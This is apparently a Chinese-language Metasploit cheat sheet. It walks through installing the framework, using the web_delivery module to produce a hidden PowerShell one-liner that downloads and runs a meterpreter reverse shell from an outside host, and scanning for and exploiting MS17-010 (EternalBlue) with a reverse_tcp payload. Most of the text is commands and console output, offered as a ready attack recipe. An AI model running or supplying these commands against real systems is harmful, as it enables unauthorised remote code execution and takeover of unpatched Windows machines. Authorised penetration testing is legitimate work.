MSF 介绍
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具
metasploit安装
最好使用这种方法安装,安装后自己安装portsql,可以使用fast serach进行漏洞查询
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
MSF web_delivery
msf > use exploit/multi/script/web_delivery
- 设置目标是什么系统,好升生成不同的PHP/PYTHON/POWERSHELL
msf exploit(web_delivery) > set target 2
target => 2
- 生成反弹payload
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
- 在服务器上开启要被访问的URL
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set URIPATH /
URIPATH => /
msf exploit(web_delivery) > set lhost ip #外网ip地址
lhost => ip
- 开启反弹shell的连接iP和端口
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
##生成的shell,如下生成的是powershell
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');
MS17-010扫描/攻击
扫描模块MS17-010可以检查出那些机器存在漏洞,哪些已被注入DoublePulsar(感染)
[+] 172.20.64.176:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[!] 172.20.64.176:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 1.1.1.1 - 1.1.1.100
set threads 100
run
入侵模块可以直接设置一个返回的meterpreter的sessions提供我们使用,目前我这边测试好像对于win2003系统成功率比较低
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 172.20.64.176
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 本机ip
msf exploit(ms17_010_eternalblue) > set lport 本机监听port
msf exploit(ms17_010_eternalblue) > run -j
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , seh, thread, process, none)
LHOST yes The listen address
LPORT 6666 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
感谢一哥